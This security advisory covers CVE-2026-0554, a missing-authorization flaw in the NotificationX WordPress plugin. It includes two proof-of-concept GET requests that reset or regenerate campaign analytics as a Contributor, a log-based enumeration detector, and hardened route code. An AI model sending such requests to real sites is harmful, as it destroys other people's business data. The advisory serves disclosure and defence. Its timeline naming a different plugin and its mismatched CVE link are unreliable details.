CVE-2026-0554 affects NotificationX and it is a missing authorization vulnerability that allows a low privilege authenticated user to perform destructive analytics operations against NotificationX campaigns they do not manage. The affected actions do not merely read data. They mutate campaign state by regenerating campaign entries and resetting analytics counters, which can erase evidence of performance, distort reporting, and disrupt marketing operations. This matters in real deployments because NotificationX is often used by marketing teams to measure conversions and social proof effectiveness. When a Contributor or Author can reset analytics for any campaign ID, the plugin loses its integrity guarantees and business decisions become based on attacker controlled telemetry.
| Field | Value |
| --- | --- |
| CVE | CVE-2026-0554 |
| Plugin Version | NotificationX <= 3.1.11 |
| All Time | 1 818 686 |
| Active installations | 50 000+ |
| Publicly Published | January 20, 2026 |
| Last Updated | January 20, 2026 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0554 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/notificationx/notificationx-3111-missing-authorization-to-authenticated-contributor-analytics-reset https://t.me/cleantalk_researches/402 |
Timeline
| Date | Event |
| --- | --- |
| December 24, 2025 | Plugin testing and vulnerability detection in the Unlimited Elements for Elementor have been completed |
| December 24, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| January 20, 2026 | Registered CVE-2026-0554 |
Discovery of the Vulnerability
The vulnerable surface is exposed through REST routes that accept an nx_id in the URL and perform state changing actions when called by any user who has the generic WordPress capability edit_posts. This capability is far too broad for managing a dedicated plugin subsystem, and it is not tied to the NotificationX campaign object being modified. The authorization logic does not enforce a NotificationX specific capability and it does not enforce an object level rule such as requiring ownership or requiring the ability to edit the underlying NotificationX post type. As a result, the endpoint becomes a direct IDOR style primitive because the attacker only needs to guess or enumerate campaign IDs and call the route. The design is further weakened because the operations are exposed as GET requests, which makes accidental triggers and cross origin triggers more likely, and violates the principle that state changing actions must use non idempotent methods.
Understanding Missing Authorization Attacks
In WordPress, proper authorization for plugin resources should be scoped to the plugin’s own objects and capabilities. Using edit_posts as a gate is a common developer mistake because it seems like a reasonable baseline, yet it includes many roles that should never manage plugin settings or analytics, including Authors on multi author sites. Analytics data is often treated as secondary, but it can have real consequences. Marketing teams use campaign stats to allocate budgets, validate experiments, and prove performance to clients. If a low privilege user can wipe or regenerate that data, they can sabotage campaigns, hide poor performance, or create confusion during incident response. The misuse of GET is also important. Many systems auto follow links for previews, caching, or indexing. A GET endpoint that resets state can be triggered unintentionally through normal browsing or link sharing, which means the vulnerability can cause damage even without a deliberate malicious actor. This is why authorization and method safety must be enforced together.
Exploiting the Missing Auth Vulnerability
To exploit CVE-2026-0554, an attacker authenticated with Contributor+ cookies sends the following two requests, one per affected route:
POC:
```http
GET /wordpress/index.php?rest_route=/notificationx/v1/regenerate/1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php
X-WP-Nonce: 00d1dde8c0
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Contributor+
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
```

```http
GET /wordpress/index.php?rest_route=/notificationx/v1/reset/1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php
X-WP-Nonce: 00d1dde8c0
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Contributor+
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
```
The direct impact is integrity loss in campaign analytics. A malicious Contributor can reset a high value campaign right before reporting, or repeatedly reset it to prevent meaningful tracking, which can cause financial disputes and operational disruption. Regeneration can also alter how entries are stored or displayed, creating inconsistencies that are difficult to debug. On sites that run many campaigns, attackers can iterate IDs and wipe analytics broadly, creating a denial of insight where the team loses historical data and cannot compare performance over time. The GET exposure increases practical risk because the reset can be triggered by embedded images, link unfurlers, or accidental clicks, meaning a single forum post or email link could cause unintended state changes when viewed by a logged in staff member. Even though the vulnerability is not direct account takeover, it can be used as a stepping stone for other attacks by obscuring detection signals and hiding abnormal activity behind a fog of missing telemetry. In marketing operations, that translates into silent sabotage that looks like normal data variance.
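The ID-iteration pattern described above leaves a footprint in ordinary web server access logs, because each reset or regenerate call carries the campaign ID in the URL. The script below is an added example (not part of this advisory or of the NotificationX plugin) that scans combined-format access-log lines for the two routes and flags any client that touches several distinct campaign IDs. The log lines are constructed for the example, the addresses come from documentation ranges, and the function names `nx_example_collect_hits` and `nx_example_alerts` are hypothetical.

```php
<?php
// Added example: detect campaign-ID enumeration against the NotificationX
// reset/regenerate routes in web server access logs (combined log format).
// The log lines below are constructed for this example.

$nx_example_log = <<<'LOG'
203.0.113.7 - - [24/Dec/2025:10:01:02 +0000] "GET /wordpress/index.php?rest_route=/notificationx/v1/reset/1 HTTP/1.1" 200 51 "http://127.0.0.1/wordpress/wp-admin/post-new.php" "Mozilla/5.0"
203.0.113.7 - - [24/Dec/2025:10:01:03 +0000] "GET /wordpress/index.php?rest_route=/notificationx/v1/reset/2 HTTP/1.1" 200 51 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Dec/2025:10:01:04 +0000] "GET /wordpress/index.php?rest_route=/notificationx/v1/regenerate/3 HTTP/1.1" 200 51 "-" "Mozilla/5.0"
198.51.100.4 - - [24/Dec/2025:10:05:00 +0000] "GET /wordpress/wp-json/notificationx/v1/reset/9 HTTP/1.1" 200 51 "-" "Mozilla/5.0"
198.51.100.4 - - [24/Dec/2025:10:06:00 +0000] "GET /wordpress/wp-admin/post-new.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
LOG;

/**
 * Group hits on the analytics routes by client address.
 * Returns [ ip => [ 'ids' => [id => true], 'actions' => [action => count], 'first' => ts, 'last' => ts ] ].
 */
function nx_example_collect_hits( $log_text ) {
    // Combined log format prefix: ip ident user [time] "METHOD path HTTP/x.y"
    $line_re  = '#^(\S+) \S+ \S+ \[([^\]]+)\] "(GET|POST) (\S+) HTTP/[\d.]+"#';
    // Matches both ?rest_route=/notificationx/v1/... and /wp-json/notificationx/v1/...
    $route_re = '#notificationx/v1/(reset|regenerate)/(\d+)#';
    $hits     = array();

    foreach ( preg_split( '/\r?\n/', $log_text ) as $line ) {
        if ( ! preg_match( $line_re, $line, $m ) || ! preg_match( $route_re, $m[4], $r ) ) {
            continue; // not a request to one of the two affected routes
        }
        $ip = $m[1];
        $ts = $m[2];
        if ( ! isset( $hits[ $ip ] ) ) {
            $hits[ $ip ] = array( 'ids' => array(), 'actions' => array(), 'first' => $ts, 'last' => $ts );
        }
        $hits[ $ip ]['ids'][ (int) $r[2] ] = true;
        $count = isset( $hits[ $ip ]['actions'][ $r[1] ] ) ? $hits[ $ip ]['actions'][ $r[1] ] : 0;
        $hits[ $ip ]['actions'][ $r[1] ] = $count + 1;
        $hits[ $ip ]['last'] = $ts;
    }
    return $hits;
}

/** One line per client; ALERT when a client touched at least $threshold distinct campaign IDs. */
function nx_example_alerts( array $hits, $threshold = 3 ) {
    $alerts = array();
    foreach ( $hits as $ip => $h ) {
        $ids = array_keys( $h['ids'] );
        sort( $ids );
        $summary = sprintf(
            '%s hit %d campaign(s) [%s] between %s and %s',
            $ip, count( $ids ), implode( ',', $ids ), $h['first'], $h['last']
        );
        $alerts[] = ( count( $ids ) >= $threshold ? 'ALERT enumeration: ' : 'INFO: ' ) . $summary;
    }
    return $alerts;
}

foreach ( nx_example_alerts( nx_example_collect_hits( $nx_example_log ) ) as $alert ) {
    echo $alert, PHP_EOL;
}
```

Run against the constructed lines, the first client is reported as an enumeration alert (three distinct IDs in three seconds) and the second as a single informational hit. Access logs identify only the client address; the PoC requests carry an `X-WP-Nonce` header and a session cookie, so mapping a hit to the WordPress user requires an application-side audit record, which is what the logging recommendation below provides.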
Recommendations for Improved Security
The fix requires both proper authorization and proper HTTP method use. The endpoints should enforce a NotificationX-specific capability that is not granted to general editorial roles, and should also enforce object-level checks so the caller can only modify campaigns they own or are permitted to manage. If NotificationX campaigns are stored as a custom post type, the server should require `current_user_can( 'edit_post', $campaign_id )` for the specific campaign ID before allowing reset or regenerate. The routes should be changed to use POST or another non-idempotent method, and they should validate a nonce tied to the action to prevent CSRF and accidental triggers. Rate limiting and audit logging should be added so that repeated resets are visible, with logs capturing the actor's user ID, the target campaign ID, and the action performed. Site owners should reduce exposure by limiting which roles have edit_posts when possible, and by reviewing NotificationX role settings so that marketing controls are not reachable by low-privilege accounts. If exploitation is suspected, restore analytics from backups where available and review campaign configuration changes around the time of resets.
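The following is an added example of how the two routes could be registered with those controls in place. It is not NotificationX's own code and not the vendor's fix; it assumes that campaigns are stored as a custom post type named `notificationx` and that the plugin defines a dedicated capability `manage_nx_analytics` granted only to administrators (both names are hypothetical), and the `nx_example_*` functions and the `nx_example_analytics_audit` hook are invented for the example.

```php
<?php
// Added example (hypothetical, not the plugin's code): hardened registration of
// the reset/regenerate routes. Assumed names: post type 'notificationx',
// capability 'manage_nx_analytics', hook 'nx_example_analytics_audit'.

add_action( 'rest_api_init', function () {
    foreach ( array( 'reset', 'regenerate' ) as $action ) {
        register_rest_route(
            'notificationx/v1',
            '/' . $action . '/(?P<nx_id>\d+)',
            array(
                // State-changing operation: accept POST only, never GET.
                'methods'             => WP_REST_Server::CREATABLE,
                'callback'            => function ( WP_REST_Request $request ) use ( $action ) {
                    return nx_example_handle_analytics_action( $request, $action );
                },
                'permission_callback' => 'nx_example_can_manage_campaign_analytics',
                'args'                => array(
                    'nx_id' => array(
                        'required'          => true,
                        'validate_callback' => function ( $value ) {
                            return is_numeric( $value ) && (int) $value > 0;
                        },
                        'sanitize_callback' => 'absint',
                    ),
                ),
            )
        );
    }
} );

/** Plugin-specific capability plus an object-level check on the named campaign. */
function nx_example_can_manage_campaign_analytics( WP_REST_Request $request ) {
    $nx_id = (int) $request->get_param( 'nx_id' );

    // 1. A dedicated capability, not the generic edit_posts that Contributors hold.
    if ( ! current_user_can( 'manage_nx_analytics' ) ) {
        return new WP_Error( 'nx_forbidden', 'Insufficient capability.',
            array( 'status' => rest_authorization_required_code() ) );
    }

    // 2. The ID must name an existing campaign of the expected post type...
    $post = get_post( $nx_id );
    if ( ! $post || 'notificationx' !== $post->post_type ) {
        return new WP_Error( 'nx_not_found', 'Unknown campaign.', array( 'status' => 404 ) );
    }

    // 3. ...and the caller must be allowed to edit that specific campaign.
    if ( ! current_user_can( 'edit_post', $nx_id ) ) {
        return new WP_Error( 'nx_forbidden', 'You may not manage this campaign.',
            array( 'status' => rest_authorization_required_code() ) );
    }
    return true;
}

/** Audit every attempt, throttle repeated changes, then perform the operation. */
function nx_example_handle_analytics_action( WP_REST_Request $request, $action ) {
    $nx_id = (int) $request->get_param( 'nx_id' );
    $user  = wp_get_current_user();

    // Audit record with actor, target and action; a logging plugin or SIEM shipper hooks this.
    do_action( 'nx_example_analytics_audit', array(
        'actor_id'    => $user->ID,
        'actor_login' => $user->user_login,
        'campaign_id' => $nx_id,
        'action'      => $action,
        'remote_addr' => isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : '',
        'time'        => time(),
    ) );

    // Per-user throttle: at most 5 analytics changes per 10 minutes.
    $key   = 'nx_example_throttle_' . $user->ID;
    $count = (int) get_transient( $key );
    if ( $count >= 5 ) {
        return new WP_Error( 'nx_rate_limited', 'Too many analytics changes; try again later.',
            array( 'status' => 429 ) );
    }
    set_transient( $key, $count + 1, 10 * MINUTE_IN_SECONDS );

    // The plugin's actual reset/regenerate work would run here (not shown).
    return rest_ensure_response( array( 'campaign_id' => $nx_id, 'action' => $action, 'ok' => true ) );
}
```

With cookie authentication, WordPress core only treats a REST request as coming from the logged-in user when it carries a valid `wp_rest` nonce (the `X-WP-Nonce` header seen in the PoC); a request without one reaches the permission callback as an anonymous user and fails the capability check. Restricting the route to POST on top of that keeps caches, prefetchers and link previews from ever invoking it.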
By taking proactive measures to address missing authorization issues like CVE-2026-0554, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #MissingAuth #WebsiteSafety #StayProtected #HighVulnerability
